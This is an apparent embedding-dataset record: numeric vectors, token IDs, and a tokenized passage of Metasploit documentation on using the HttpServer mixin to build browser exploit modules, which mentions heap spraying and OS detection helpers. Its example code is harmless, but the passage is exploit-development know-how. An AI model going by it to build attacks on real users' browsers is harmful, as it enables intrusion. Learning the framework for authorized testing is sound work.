0.41340792179107666, 0.0743781104683876, -0.45941972732543945, 0.0018521060701459646, -0.39032870531082153, 0.24206553399562836, -0.7091460824012756, -0.27665212750434875, 0.13478538393974304, -0.14405040442943573, 0.9448617696762085, -0.08843479305505753, -0.20645789802074432, 0.5188489556312561, 0.7972871661186218, -0.05707119032740593, -0.6471748352050781, 0.42961135506629944, 0.5885711312294006, -0.521769106388092, -0.3719363510608673, 1.1932027339935303, 0.1216021403670311, -0.6565065979957581, 1.3189305067062378, -0.20657740533351898, 0.06268720328807831, -0.8583386540412903, 0.8650299310684204, 0.7137530446052551, 0.035189878195524216, -0.6021193861961365, -0.2150624543428421, -0.8709307312965393, 0.85624098777771, 0.27168959379196167, 0.6258363127708435, -0.20670266449451447, 0.18399648368358612, -0.38895487785339355, 0.9172786474227905, 0.26096487045288086, -0.10673021525144577, 0.42156314849853516, 0.7835308313369751, 0.11402592808008194, 0.19445258378982544, -0.10208527743816376, -0.30404385924339294, 0.67783123254776, 0.4281296133995056, 0.4546188712120056, -0.100357286632061, 0.16466361284255981, -0.7741115093231201, -0.11911287158727646, 0.6380165219306946, -0.43944796919822693, 0.7275310754776001, 0.5794582962989807, -0.17348767817020416, -0.3449075520038605, -0.1912391185760498, 0.2829189896583557, 0.9692741632461548, -0.723844051361084, -0.47592300176620483, 0.054969098418951035, -0.8082952499389648, -0.31495651602745056, 0.06031366065144539, 0.4008306562900543, 0.7734436392784119, 0.8514030575752258, -0.2103455662727356, 0.5706528425216675, -0.25691425800323486, -0.30993908643722534, -0.8850026726722717, -0.14143319427967072, -0.05510342866182327, -0.9507015943527222, 0.32439950108528137, 0.6902076601982117, -0.29393520951271057, 0.23475855588912964, -0.3828369379043579, 0.7277514934539795, 0.3570660650730133, -0.2662113606929779, 1.2027480602264404, -0.3756793737411499, 0.6383966207504272, -0.05736300349235535, -0.00797975156456232, -0.12610357999801636, 0.506050705909729, -0.47184059023857117, 0.4917970895767212, 0.6335325241088867, -0.04445727542042732, -0.7727974057197571, 0.05673201009631157, -0.02537163719534874, 0.6702569723129272, -0.49751707911491394, -0.5100200176239014, -0.6711292862892151, 0.2604784369468689, -0.30579230189323425, -0.020829059183597565, 0.36795467138290405, 0.033636756241321564, 0.0391865000128746, -0.45827075839042664, 0.5356968641281128, 0.20775678753852844, -0.9462611079216003, 0.6471795439720154, -0.5059926509857178, 0.23020364344120026, -0.5142624378204346, 0.9301758408546448, 0.1575007438659668, -0.11003634333610535, 0.1280975192785263, -0.6431229710578918, 0.38566797971725464, -0.47781142592430115, -0.40920233726501465, -0.5987694263458252, -0.07677514851093292, -0.1998203843832016, 0.4890854060649872, -0.4152948558330536, 0.6291190385818481, -0.7829075455665588, 0.10477681457996368, -0.2518760859966278, -0.596730649471283, 0.6345379948616028, -0.23832851648330688, -0.13025403022766113, -0.6776174306869507, -0.5610474944114685, -0.9365114569664001, -0.4617798924446106, 0.5850837230682373, -0.4592043161392212, -0.08637017011642456, 1.6271636486053467, -0.21130065619945526, 0.3692184388637543, 0.3645588457584381, 0.22781693935394287, 0.28027212619781494, -0.039170898497104645, -0.04853374511003494, -0.18450325727462769, 0.2671898305416107, 0.12376751750707626, -0.7727025747299194, 0.7447721362113953, -0.2442484349012375, -0.19374634325504303, 0.056799449026584625, -0.29183363914489746, 0.026512285694479942, -0.3186744749546051, -0.005205742083489895, -0.5231035351753235, -0.4588627517223358, -0.8684278726577759, 0.2139514833688736, 0.6158006191253662, 0.4910736680030823, -1.5317161083221436, -0.6275122165679932, -0.01983809657394886, -0.03157570958137512, -0.336730420589447, 0.2051745057106018, 0.13315407931804657, 0.42414751648902893, 0.44427603483200073, 0.5696744918823242, -0.24907398223876953, 0.7687154412269592, -0.3227977156639099, 0.3284629285335541, 0.7185899019241333, 0.4626336097717285, 0.057864755392074585, -1.6130157709121704, -0.16141237318515778, -0.20431748032569885, -0.3154427111148834, -0.31947600841522217, -0.9292759299278259, -0.18036532402038574, 0.291379451751709, -1.0943385362625122, -0.8604844212532043, 0.515384316444397, 0.1115214079618454, 0.4740942120552063, 0.546040415763855, 0.575934886932373, 0.2594432234764099, 0.5462137460708618, 0.4753129780292511, -0.15074780583381653, 0.4891153872013092, -0.7380369901657104, 0.9201740026473999, 0.5870577096939087, 0.5863074064254761, -0.7287061810493469, -0.7056623697280884, 0.8258424401283264, 0.3027763366699219, -0.3736705482006073, -0.36847326159477234, -0.2906533479690552, 0.2575773596763611, 0.1272088885307312, 0.18326346576213837, -0.150476336479187, -0.1634015440940857, -0.6716562509536743, 0.9092087149620056, 0.3450627326965332, -0.6559415459632874, 0.8602991700172424, -0.7961505055427551, 0.7812812924385071, 0.46048715710639954, -0.025149064138531685, -0.11057067662477493, -0.37848836183547974, -0.4856586158275604, -0.7478079199790955, 1.2126753330230713, 0.9922528862953186, -0.7476896047592163, 0.3819121718406677, -0.6957100629806519, 0.10346728563308716, 0.40389230847358704, 0.09167539328336716, -0.48079434037208557, 0.14131687581539154, 0.12172456830739975, 0.002444023732095957, -0.12716732919216156, -0.8934320211410522, -0.857154130935669, 0.4368329644203186, -0.41555464267730713, 0.6366117596626282, -0.677802562713623, -0.7423833012580872, 0.13301873207092285, -0.3703508675098419, 0.8742371797561646, 0.36617401242256165, 0.10306229442358017, 0.38914546370506287, -0.29502829909324646, -0.05910353362560272, -0.5743396282196045, -0.18883223831653595, 0.49253466725349426, -0.5483907461166382, 0.14936494827270508, 0.3175162076950073, -0.7874113917350769, -0.19888733327388763, 0.20725950598716736, 0.019443204626441002, 0.030140573158860207, 0.14831818640232086, 0.6496128439903259, -0.06683696061372757, -0.4067355990409851, 0.1110866367816925, 0.2938009202480316, -0.8521138429641724, 0.39384517073631287, 0.03162737935781479, -0.490889310836792, 0.7150694727897644, -0.22530889511108398, 0.6738525032997131, 0.06419838964939117, -0.28481218218803406, 0.5057007074356079, -0.540215253829956, 0.3905471861362457, 0.06739731132984161, -0.05336521565914154, -0.766020655632019, 0.4461365342140198, -0.9030751585960388, -0.2052580565214157, -0.18706601858139038, 0.35432031750679016, 0.24963118135929108, -0.8319283127784729, -0.42010048031806946, 0.11310070753097534, -0.05352761223912239, -0.895596981048584, -0.7623186707496643, 0.12999185919761658, -0.4006941020488739, -0.4627015292644501, 0.3368750214576721, 0.18459323048591614, -0.19224783778190613, 0.4598742425441742, 0.10359746217727661, 0.38255709409713745, 0.1810285598039627, -0.12280641496181488, -0.13991709053516388, 0.5634757876396179, 0.8359278440475464, -0.7145839929580688, -0.22586414217948914, 0.34216469526290894, -0.023138990625739098, 0.8119449615478516, 0.3531213104724884, -0.5272947549819946, -0.21419763565063477, -0.6695622205734253, -0.36409056186676025, -0.9121229648590088, -0.41640186309814453, -0.4616674780845642, -1.1855419874191284, -0.44794490933418274, 0.3521749675273895, 0.0333624929189682, -0.5576891899108887, 0.2292928248643875, -0.5347819924354553, 1.2684067487716675, -0.040389902889728546, -0.0909070298075676, -0.6695944666862488, -0.0619104839861393, 0.081075020134449, 1.027671456336975, -0.9021017551422119, -0.6914905309677124, -0.46505361795425415, 0.07206747680902481, -0.1443561166524887, 0.21754689514636993, -0.5519535541534424, -0.3649239242076874, 0.44748762249946594, 0.01930336281657219, -0.42229580879211426, 0.39441391825675964, -0.1607528179883957, 0.20849458873271942, 0.37389129400253296, -0.051982246339321136, -0.21397604048252106, -0.2736900746822357, -1.0841052532196045, 0.6358569264411926, 0.14582855999469757, -0.4629143178462982, 0.3653458058834076, 0.2832271158695221, 0.864856481552124, 0.6073586940765381, -0.0454774834215641, 0.2630874216556549, -1.1002289056777954, -1.25106942653656, -0.5017237663269043, 0.10155697166919708, 0.020077966153621674, -0.31136035919189453, -0.6119106411933899, -0.45785656571388245, 0.1758393943309784, 0.02596123516559601, 0.9127665162086487, 0.7432527542114258, -0.07469621300697327, 0.30586451292037964, -0.9990904927253723, 1.2501676082611084, 0.1568501591682434, 0.4390197992324829, 0.05520370230078697, -0.2053869515657425, -0.7323428392410278, -0.27822133898735046, -0.3577820956707001, -0.7842717170715332, -0.2684412896633148, 0.12432966381311417, 0.7761034965515137, -0.38335126638412476, 0.8777489066123962, -0.7101684808731079, -0.45267632603645325, 0.19740502536296844, 0.9045207500457764, 0.8065182566642761, -0.21448251605033875, 0.7527022957801819, 0.43856748938560486, 0.3107245862483978, 0.8388703465461731, 0.1411384642124176, 0.2029266506433487, -0.2611624300479889, 0.3294126093387604, 0.18303856253623962, -0.22113685309886932, 0.41646072268486023, 0.738427460193634, -0.02391686849296093, -0.9729946851730347, -0.22303907573223114, -0.42698052525520325, -0.11968644708395004, -0.5363163948059082, -0.3298501670360565, -0.13430100679397583, -0.14826847612857819, -0.008758018724620342, -0.12455759942531586, 1.1834542751312256, -0.167075976729393, -0.7457553744316101, -0.1205507144331932, -0.40510907769203186, 0.28498518466949463, 0.8430638909339905, 0.21867628395557404, -0.24987225234508514, -1.3860629796981812, -0.6534527540206909, -0.3458434045314789, 0.23970521986484528, 0.4123539924621582, -0.5852988362312317, 0.6036360263824463, 0.7262647747993469, -0.3046749532222748, 0.6958416700363159, 0.046673402190208435, -0.006606046576052904, 0.8590244054794312, -0.2361719310283661, -0.6924035549163818, -0.2941969037055969, 0.3927760720252991, -0.8121354579925537, 0.9602958559989929, -0.049981363117694855, -0.1838357001543045, 0.03982338309288025, -0.691266655921936, 0.14262188971042633, -1.0255889892578125, -0.33824893832206726, -0.7743862867355347, -0.43458205461502075, -0.27073386311531067, -0.6149872541427612, -0.5485454797744751, 0.6219610571861267, -0.4645410180091858, -0.3969373106956482, -0.2541767954826355, 0.09365096688270569, -0.0076474761590361595, -0.15182657539844513, 0.08300001919269562, 0.07776165008544922, -0.5805424451828003, 0.41232776641845703, 0.06231291592121124, -0.6301842331886292, 0.5840812921524048, -0.14034636318683624, 1.0316795110702515, 0.32519254088401794, -0.7916191220283508, 0.5670382380485535, -0.45747074484825134, 0.5432674884796143, -0.49992477893829346, -0.31312400102615356, -0.5808537602424622, 0.45246756076812744, -0.28360122442245483, 0.32560572028160095, 0.7795144319534302, -0.20472688972949982, -0.02357042394578457, -0.27169549465179443, 0.2717389166355133, 0.1428050547838211, 0.28125619888305664, 0.40368854999542236, 0.09929851442575455, -0.511021614074707, -0.8548827171325684, 0.7001063227653503, -0.5170159935951233, 0.5648210644721985, 0.007588184904307127, -0.09808271378278732, 0.4381026327610016, -0.019239408895373344, 0.0798916220664978, 0.2614961862564087, -0.3355560898780823, -0.04750300198793411, -0.6354798078536987, 0.24299831688404083, 0.5182566046714783, -0.19379808008670807, -0.5595061182975769, -0.6992699503898621, 0.27123069763183594, -0.0240350179374218, 1.0597758293151855, 0.22160346806049347, -0.14705190062522888, -0.02806498110294342, -0.6140408515930176, -0.3390580415725708, -0.6839573383331299, -0.24720212817192078, -0.10373752564191818, -0.3733779489994049, -0.369739830493927, 0.3093520402908325, -0.46414393186569214, 0.5080851912498474, -0.49429941177368164, 0.5136746764183044, -1.712294340133667, -0.3906539976596832, 0.6321894526481628, -0.44696080684661865, -0.5993972420692444, -0.12072988599538803, -0.8632834553718567, 0.37569907307624817, 0.08301786333322525, -0.09841056913137436, 0.8039068579673767, 0.3668612539768219, 0.457986056804657, 1.3048478364944458, -0.6769092679023743, -0.38018304109573364, -0.948015034198761, 0.8116590976715088, -1.0932857990264893, -0.7945136427879333, -0.574434757232666, 0.3270111382007599, -0.44571807980537415, 0.6325401663780212, -0.7804178595542908, -0.547066867351532, 0.3179156482219696, -0.7621626853942871, -0.3147028684616089, -0.4439077377319336, 0.20152361690998077, 0.22502803802490234, -0.025392359122633934, 0.49839964509010315, 0.12536247074604034, 0.1375405639410019, -0.07260604947805405, 0.3814600110054016, -0.757520318031311, -0.18713420629501343, 0.41531187295913696, -0.15429215133190155, 0.5363824963569641, 0.5888113379478455, -0.06966511905193329, 0.8903771042823792, -0.3594433069229126, -0.9311904311180115, 0.8643968105316162, 0.0033166275825351477, 0.9788402318954468, -0.21776454150676727, 0.10506635904312134, 0.27893584966659546, -0.6648885011672974, -0.5054749250411987, 0.4533165395259857, -0.38500410318374634, -0.16005875170230865, 1.2498105764389038, -1.1438754796981812, -0.4995495080947876, -0.5208566784858704, -0.14509806036949158, -0.15578359365463257, -0.08901524543762207, 0.2525385618209839, -0.4614133834838867, -0.354926735162735, 0.8956424593925476, 0.5273675918579102, -0.6328181624412537, -0.28914567828178406, -0.4738771915435791, 0.22805792093276978, 0.2573452293872833, 0.7543200850486755, -0.4875484108924866, 0.620048463344574, 0.25311073660850525, 0.7300808429718018, 0.15767934918403625, 0.008673207834362984, 0.6880272626876831, -0.1553524136543274, 0.8814040422439575, -0.6880180835723877, -0.1870604306459427, 0.31248730421066284, -0.46832314133644104, -0.8410513997077942, -0.46909093856811523, 0.06266029924154282, 0.33644166588783264, 0.17695143818855286, -0.648893415927887, 0.28423213958740234, -0.8472104668617249, 0.48452529311180115, -0.7096688747406006, -0.29056522250175476, 0.7601118683815002, -0.8530838489532471, 0.701011598110199, 0.8780414462089539, -0.9458542466163635, 0.04047473520040512, 0.10978495329618454, -0.06054176390171051, -0.44730299711227417, 1.1867327690124512, 0.1138865202665329, 0.4740031957626343, -0.19864225387573242, -0.49335211515426636, -0.6556698679924011, 0.04977460950613022, 0.11832558363676071, -0.1706968992948532, 0.04627114534378052, 0.015729812905192375, -0.6679354906082153, -0.35767030715942383, 0.12839387357234955, -0.5750427842140198, 0.08902544528245926, 0.10923582315444946, 0.19122518599033356, -0.5082721710205078, 0.33131855726242065, 0.21424119174480438, 0.45453572273254395, 0.2972712516784668, -0.28013089299201965, 0.3524151146411896, -0.12229324877262115, -0.35740500688552856, -0.8752182722091675, -0.22999140620231628, -0.07705393433570862, -0.22910656034946442, 0.08184248954057693, -0.13585494458675385, -0.5123862028121948, -0.014480788260698318, -0.0861174613237381, 0.38688498735427856, 0.4594106376171112, 1.0971519947052002, -0.10323190689086914, 0.1950606405735016, -0.8683499097824097, -0.1397659033536911, 0.44597893953323364, 0.5302436351776123, -0.28800347447395325, 0.893535315990448, 0.2723979353904724, 0.07900522649288177, -0.305562824010849, -0.046269431710243225, 0.061172593384981155, 0.04249679669737816, 0.5281952619552612, -0.1895212084054947, -0.5012861490249634, -1.128570556640625, 0.004607093520462513, 0.451915442943573, 0.3339516222476959, 0.12938076257705688, -0.5645362138748169, -0.7355307936668396, -1.2321630716323853, -0.3986979126930237, -0.1495368331670761, 0.025368236005306244, 0.8283627033233643, -0.04020058736205101, 0.01651701144874096, 0.15334606170654297, -0.14646562933921814, 4.100210666656494, 0.6527286171913147, 0.3881068229675293, 0.037991154938936234, 0.4769188165664673, 1.4650110006332397, 0.3328778147697449, 0.13311608135700226, -0.06640901416540146, -0.4798431396484375, 0.8248565793037415, -0.29766449332237244, 0.5101587176322937, 1.020097017288208, 0.05042129009962082, 1.4327521324157715, -0.26157182455062866, 0.019813377410173416, 1.157759666442871, -0.4377927780151367, -0.574596107006073, 0.6316908001899719, 0.30355706810951233, 0.6125020384788513, 0.45092493295669556, 0.503824770450592, 0.625762939453125, 0.6361382007598877, -0.5743903517723083, -0.13999278843402863, -0.4829193949699402, -0.6302636861801147, 0.046883050352334976, -0.16980251669883728, -0.020525239408016205, 0.0111056137830019, -0.15150749683380127, -0.3778320252895355, 0.5879840850830078, -0.25739163160324097, 0.6810356378555298, -0.15681204199790955, -0.4313617944717407, 0.3603304624557495, 0.06524945050477982, 0.17357482016086578, 0.40919503569602966, -0.2668275535106659, 0.34458497166633606, -0.8548393249511719, 0.043594952672719955, -0.34975770115852356, 0.5376884937286377, 0.3886682689189911, -0.007961303927004337, 0.28434619307518005, 0.5920634269714355, 0.3703867495059967, 0.5287494659423828, 0.3872455954551697, -0.6573886871337891, 0.7840608954429626, -0.4686318039894104, 0.7847779393196106, -0.4966641366481781, 0.6673702001571655, 0.2891053855419159, 0.04910871386528015, -0.011550644412636757, 0.12885814905166626, -0.2151106297969818, -0.34273576736450195, -1.1252073049545288, -0.8200839161872864, -0.5751574039459229, 0.20316535234451294, -0.2307729423046112, 0.26813623309135437, 0.1341174691915512, -0.2600921094417572, 0.228520467877388, -0.2755626142024994, 0.09155783802270889, -0.34517401456832886, -0.12530425190925598, 0.35940980911254883, -0.08740051090717316, -0.2875637412071228, -0.09422625601291656, 0.8527369499206543, 0.4752362370491028, 1.1438392400741577, -0.17199498414993286, -0.9821686148643494, -0.036506909877061844 ]
[ 4008, 22932, 1011, 1028, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4749, 2581, 22025, 1007, 2012, 16798, 2509, 1011, 5890, 1011, 2324, 2260, 1024, 5641, 1024, 2410, 1009, 2199, 2692, 8316, 28139, 3334, 1028, 102 ]
metasploit
11.txt
4
[CLS] the metasploit framework provides different mixins you can use to develop a browser exploit, mainly they are msf : : exploit : : remote : : httpserver, msf : : exploit : : remote : : httpserver : : html and msf : : exploit : : remote : : browserexploitserver. this writeup covers the httpserver mixin. the httpserver mixin is kind of the mother of all http server mixins ( like browserexploitserver and httpserver : : html ). to use it, your module is required to have a β€œ on _ request _ uri ” method, which is a callback triggered when the http server receives a http request from the browser. an example of setting up β€œ on _ request _ uri ” : # # listens for a http request. # cli is the socket object, and request is a rex : : proto : : http : : request object # def on _ request _ uri ( cli, request ) print _ status ( " client requests uri : # { request. uri } " ) end the β€œ on _ request _ uri ” method is also where you can create the http response. here ’ s a couple of choices you can use to do that : send _ not _ found ( cli ) - sends a 404 to the client. make sure to pass the cli ( socket ) object. send _ redirect ( cli, location = ’ / ’, body = ’ ’, headers = { } ) - redirects the client to a new location. send _ response ( cli, body, headers = { } ) - sends a response to the client. this method is probably what you ’ ll be using most of the time. if you ’ ve seen some of our exploit modules, you will also see them using exploit : : remote : : httpserver : : html instead of exploit : : remote : : httpserver. usage is mostly the same, the difference is the exploit : : remote : : httpserver : : html mixin gives you access to some javascript functions like base64, heap spraying, os detection, etc. here ’ s an example of sending a http response : # # sends a " hello, world! " to the client # def on _ request _ uri ( cli, request ) html = " hello, world! " send _ response ( cli, html
[ 0.22602427005767822, 0.27014288306236267, -0.6189234256744385, -0.11141408234834671, -0.21079504489898682, -0.2060774862766266, -0.5681290030479431, 0.16796407103538513, 0.835217297077179, 0.7785906195640564, 0.20404988527297974, 0.09008605033159256, 0.4956875741481781, -0.5814910531044006, -0.11348658055067062, -0.3859768211841583, -0.5335732698440552, -0.4037172198295593, -1.2170295715332031, 0.016956398263573647, 0.12016420811414719, -0.7601830959320068, -0.6150009632110596, -1.1267530918121338, 0.008523412048816681, 0.7645626664161682, 0.33598241209983826, -0.5382192134857178, 0.30389654636383057, 0.4771360754966736, 0.34650662541389465, 0.06860628724098206, -0.2647455930709839, -0.6114044785499573, 0.5347672700881958, -0.16022281348705292, 0.5581594705581665, -0.875292181968689, -0.10450883209705353, -1.0742133855819702, 0.6497258543968201, -0.5726526975631714, -0.36941802501678467, -0.7031162977218628, -0.5046868920326233, -0.36863070726394653, 0.07642057538032532, -0.15323716402053833, 1.0836472511291504, 0.04378664121031761, 0.7477931976318359, 0.5683978796005249, -0.27230340242385864, 0.2991471290588379, -0.26855233311653137, 0.13301154971122742, 0.1424112468957901, 0.2154819518327713, -0.8670644164085388, -0.005658669397234917, -0.15721091628074646, 0.6670677065849304, -0.33227303624153137, -0.9885415434837341, 0.08500415831804276, 0.5761194229125977, 0.13947941362857819, -0.0863955169916153, -0.5098757147789001, -0.6358906030654907, -0.7090800404548645, 0.7262687683105469, -0.7398441433906555, -1.0621329545974731, -0.06595617532730103, -0.013122551143169403, 0.031392652541399, -0.3813806474208832, -0.31202808022499084, 0.72981858253479, 0.24557767808437347, 0.8374367356300354, 0.05392947793006897, -0.31901994347572327, 0.1280728280544281, -0.1855936497449875, 0.5718450546264648, 0.7438491582870483, -0.2236880511045456, 0.6595607995986938, 0.7919778227806091, 0.408072829246521, -0.3551832437515259, -0.13504381477832794, 0.2479970008134842, 0.5819052457809448, -0.3655818998813629, 0.6688423752784729, 0.09512149542570114, 0.30645084381103516, 0.8683423399925232, 0.7189545035362244, -0.1460558921098709, 0.1917366087436676, -0.04698222503066063, 0.586961030960083, -0.2009798288345337, 0.1135072410106659, -0.9486052989959717, -0.7383446097373962, 0.3896836042404175, 0.13191351294517517, 0.14476056396961212, -0.8254075050354004, -0.06970789283514023, 0.43143755197525024, 0.5935021042823792, -0.03277432173490524, -0.5754927396774292, 0.5609686970710754, -0.2919746935367584, -0.3411768674850464, -0.08462883532047272, -0.05953293293714523, 0.4658057689666748, 0.25452864170074463, 0.3675573468208313, 0.6325465440750122, -0.4911547303199768, -1.1622332334518433, -0.410645991563797, -0.4503442347049713, -0.04443925991654396, 1.0281685590744019, -0.45639121532440186, 0.5780737996101379, -0.7295604348182678, 0.0577559657394886, 0.7248957753181458, -1.422668695449829, 0.11297274380922318, 0.11316779255867004, 0.0989147499203682, 1.2070931196212769, 0.8043781518936157, 0.10090457648038864, -0.4233608543872833, -0.4579511284828186, -0.4523608386516571, -0.008556663058698177, -0.0756247267127037, -0.1914704442024231, 0.43787360191345215, -0.12056378275156021, 0.06096276640892029, 0.046994250267744064, -1.3488225936889648, 0.6735840439796448, 0.02209617756307125, -0.11027064174413681, 0.02135417051613331, 1.376887321472168, -0.007320125121623278, 0.5459797978401184, -0.28814977407455444, 0.24823282659053802, -0.9098800420761108, -0.44902345538139343, -0.18791066110134125, -0.1417621225118637, 0.13829044997692108, -0.08982903510332108, 0.791877031326294, 0.37549087405204773, 0.9942343831062317, 0.6125236749649048, 0.07809856534004211, -0.213118314743042, 0.3340151011943817, 0.8477068543434143, 0.048353467136621475, 0.619385302066803, 0.1411946564912796, 0.8773693442344666, 0.5112612843513489, 0.5307108163833618, 0.1537618786096573, -0.824363648891449, -0.3963240087032318, 0.08012636750936508, -0.17290306091308594, 0.996907651424408, -0.7242563366889954, 0.38484448194503784, 0.5491716861724854, -0.30693262815475464, -0.9543243050575256, 0.5054098963737488, -0.13697093725204468, -1.3638920783996582, -0.595772385597229, 0.3529580533504486, 0.09057850390672684, 0.4897833466529846, -0.025214016437530518, -0.27971118688583374, 0.5274136662483215, 0.3653092384338379, -0.3102211058139801, 0.2308613806962967, 1.0297178030014038, -0.4970019459724426, -0.9677639007568359, 0.28438007831573486, 0.42190802097320557, 0.12795597314834595, -0.6074992418289185, 0.15992382168769836, 0.028060808777809143, -0.025612754747271538, 0.15290714800357819, 0.4272233843803406, 0.5127050280570984, 0.09029627591371536, -1.0275795459747314, -0.49433979392051697, 0.1364617496728897, 0.4553301930427551, -0.2730638086795807, 0.4213932156562805, -0.289892315864563, 0.2302931398153305, 0.22875508666038513, 1.0547350645065308, -0.18032529950141907, -0.12791159749031067, -0.026530850678682327, 0.0453178696334362, -0.009169129654765129, 0.4085559844970703, -0.26897481083869934, 1.0230196714401245, -0.08278068900108337, 1.0347487926483154, 0.6715598702430725, 0.21315090358257294, 0.1797836571931839, 0.6738258600234985, -0.2761346101760864, 0.5325682759284973, -0.3879244029521942, 1.2992775440216064, -0.07365532219409943, -0.3398297429084778, -0.3750095069408417, -0.5359984040260315, 0.07967699319124222, 1.4372961521148682, -0.903765857219696, -1.1873177289962769, 0.2618204653263092, 0.25429633259773254, -0.5939902663230896, -0.10844501852989197, 0.33548295497894287, 0.9280506372451782, -0.48825085163116455, 0.06558789312839508, -0.4435822069644928, -1.0135571956634521, -0.566526472568512, -0.007380608934909105, -1.6077234745025635, -0.5988056063652039, -0.7390768527984619, -0.14633819460868835, 0.036674000322818756, 0.26860374212265015, 0.22430358827114105, -0.18705712258815765, -0.3693412244319916, 0.2655739188194275, 0.5520462989807129, 0.36963093280792236, 0.6012413501739502, -0.1477927416563034, -0.7898603677749634, -0.060080792754888535, -0.7777294516563416, 0.5092322826385498, -0.9169804453849792, -0.03442663699388504, 0.03961886093020439, -0.1447283923625946, 0.29586130380630493, 0.0277866218239069, 1.052356481552124, 0.352169007062912, -0.003984228707849979, -0.04319232329726219, -0.03556523844599724, 0.1969814896583557, 0.33218663930892944, -0.17190521955490112, -0.33275043964385986, 0.19019782543182373, -0.11059939116239548, 0.05260083079338074, 0.842801034450531, 0.6806705594062805, -0.5125771164894104, 0.717069685459137, -0.09277252852916718, 0.004700516350567341, -0.45943954586982727, 0.6127588152885437, 0.8088393807411194, 0.11872841417789459, -0.06617327034473419, -0.3566993474960327, 0.430337518453598, -0.11044541746377945, -0.26575788855552673, -0.08110648393630981, -0.09840641170740128, 1.1296347379684448, 0.4391191005706787, -0.861560046672821, 0.2816475033760071, -0.2678510844707489, -0.07934913784265518, 0.2413932830095291, -0.003393317572772503, 0.7428938746452332, -0.2601219117641449, 0.41453447937965393, 0.20865091681480408, -0.1477583795785904, 0.20877020061016083, -0.004281202331185341, 0.2240251898765564, -0.8099352121353149, 0.8719168305397034, -0.17009112238883972, 0.10318055748939514, 0.5824791789054871, 0.3848448395729065, -1.0580642223358154, 0.16635166108608246, -0.5728318095207214, -0.355732798576355, 0.4708617925643921, 0.8476941585540771, 0.042083024978637695, -0.23829227685928345, 1.465706706047058, -0.7065940499305725, -0.07660121470689774, 0.6492745876312256, 0.5798478126525879, 0.5753481984138489, -0.32308268547058105, 0.20665065944194794, -0.2972874641418457, -0.6075032949447632, -0.3383263349533081, 0.24439916014671326, 0.564454197883606, 0.4124015271663666, -0.4054214060306549, 0.38279417157173157, 0.2652086615562439, -0.16584663093090057, 0.7406111359596252, -0.16820000112056732, -0.8644198179244995, 0.7272089123725891, -0.06474093347787857, 0.4571353793144226, 0.04403594508767128, 0.33288314938545227, -0.37654170393943787, 0.33449944853782654, 0.13039471209049225, -0.022438421845436096, -0.5596174001693726, -0.20971229672431946, -0.6931461095809937, -0.1257886290550232, -0.3801323175430298, -0.3897990882396698, -0.06959637254476547, 1.001885175704956, -0.21880057454109192, -0.2553195357322693, -0.5257888436317444, 0.7392685413360596, 0.9467211961746216, 1.2878988981246948, 0.9666350483894348, 0.7317144870758057, 0.7016081809997559, -0.21855708956718445, 0.4620206654071808, -0.2688307762145996, 0.03435097634792328, 0.0917661264538765, 0.5614668726921082, 0.1492500752210617, 0.4267267882823944, 0.06290517002344131, 0.16151228547096252, -0.693116307258606, 0.14633919298648834, -0.23533830046653748, -0.26066598296165466, -0.866770327091217, -0.34067055583000183, 0.3768283426761627, 0.12592262029647827, -0.22200101613998413, -0.613375723361969, -0.02209634706377983, 0.5467308759689331, 0.750762403011322, -0.6637448072433472, -0.4458862245082855, -0.6886259317398071, -0.5152109861373901, 0.07939915359020233, 0.2442430704832077, -0.47171536087989807, -1.065038800239563, 0.3109603822231293, -1.1781197786331177, 0.14567795395851135, 0.6251373291015625, 0.16095387935638428, 0.014868775382637978, -1.2484263181686401, -0.5261543989181519, 0.34127455949783325, -0.42716410756111145, -0.44207850098609924, -0.17147302627563477, 0.40227189660072327, 0.1037476435303688, 0.34535354375839233, -0.5467353463172913, -0.4797886312007904, -0.10944891721010208, -0.8279199600219727, 0.8523748517036438, -0.49772894382476807, 0.8139150738716125, -0.13163615763187408, 0.4105396568775177, 0.31451916694641113, 0.22651278972625732, -0.2616907060146332, -0.13768045604228973, -0.5746371746063232, -0.17267552018165588, -0.4107854962348938, 0.10991904884576797, 0.25064560770988464, -0.4238997995853424, -0.24653230607509613, 0.26988711953163147, 0.32560938596725464, -0.780270516872406, 0.3206303119659424, -0.19159938395023346, -0.23467525839805603, 0.3271371126174927, -0.8020702004432678, 0.3804360330104828, 0.5355821847915649, -0.3466542363166809, -0.029032712802290916, -0.7064188122749329, 1.2165968418121338, 0.3407311737537384, 0.20685511827468872, -0.5136640071868896, -0.3294573724269867, 0.4879000782966614, 0.4441295862197876, -0.16346116364002228, 0.32886776328086853, -0.45815688371658325, -0.3062558174133301, -0.4241223633289337, -0.24015690386295319, -0.4619444012641907, -0.567354142665863, 0.10635023564100266, 0.036243002861738205, 0.2227773219347, 0.37451624870300293, 0.9807633757591248, -0.07773702591657639, -0.7272457480430603, -0.12605328857898712, -0.9464039206504822, 0.40744245052337646, -0.6835944652557373, 0.23398154973983765, -0.5461011528968811, 0.21370446681976318, -0.5158451795578003, 0.6604589223861694, -0.40474674105644226, -0.5576557517051697, 0.42407742142677307, 0.5177785158157349, 0.3448064625263214, -0.7707707285881042, -0.6439710259437561, 0.6875677108764648, -0.05305378884077072, -0.7192875742912292, 0.5628436207771301, 0.48173004388809204, -0.13259251415729523, 0.6085656881332397, 0.35126638412475586, 0.12804557383060455, -1.0540237426757812, -0.47293832898139954, 0.30209773778915405, -0.6283648014068604, 0.34689056873321533, -0.7011340856552124, -0.7446616291999817, -0.6876534223556519, 0.4190380275249481, -0.13397659361362457, -1.4448612928390503, -0.21116867661476135, -0.20114775002002716, 0.11065923422574997, -0.5165505409240723, -0.14447522163391113, 0.07234769314527512, -0.45884019136428833, 0.30019259452819824, 0.8680685758590698, 0.26187869906425476, 0.15404517948627472, -0.23001669347286224, 0.1593126803636551, 0.5884402394294739, 0.16979999840259552, -0.9456883072853088, -0.4564291834831238, -0.33355480432510376, -0.1501333862543106, -0.15197211503982544, 0.4572693407535553, -0.7545281052589417, 0.39334332942962646, 0.010323656722903252, 0.6190205216407776, -0.4938792586326599, 0.1344810128211975, 0.13431593775749207, 0.3677477538585663, 0.18634888529777527, -0.3753458261489868, 0.038409922271966934, 0.040809474885463715, 0.7965586185455322, 0.7036105990409851, -0.7177783846855164, -0.966064989566803, 0.06930624693632126, -0.7163031697273254, -1.1158779859542847, 0.6634929776191711, -0.012491145171225071, -0.19660110771656036, 0.1311463862657547, -0.5629134178161621, 0.15182605385780334, 0.019810812547802925, -0.010181545279920101, 0.9720126986503601, 0.12053773552179337, 0.9866076707839966, -1.5600507259368896, 1.4358835220336914, 0.9434565305709839, -0.1854897290468216, 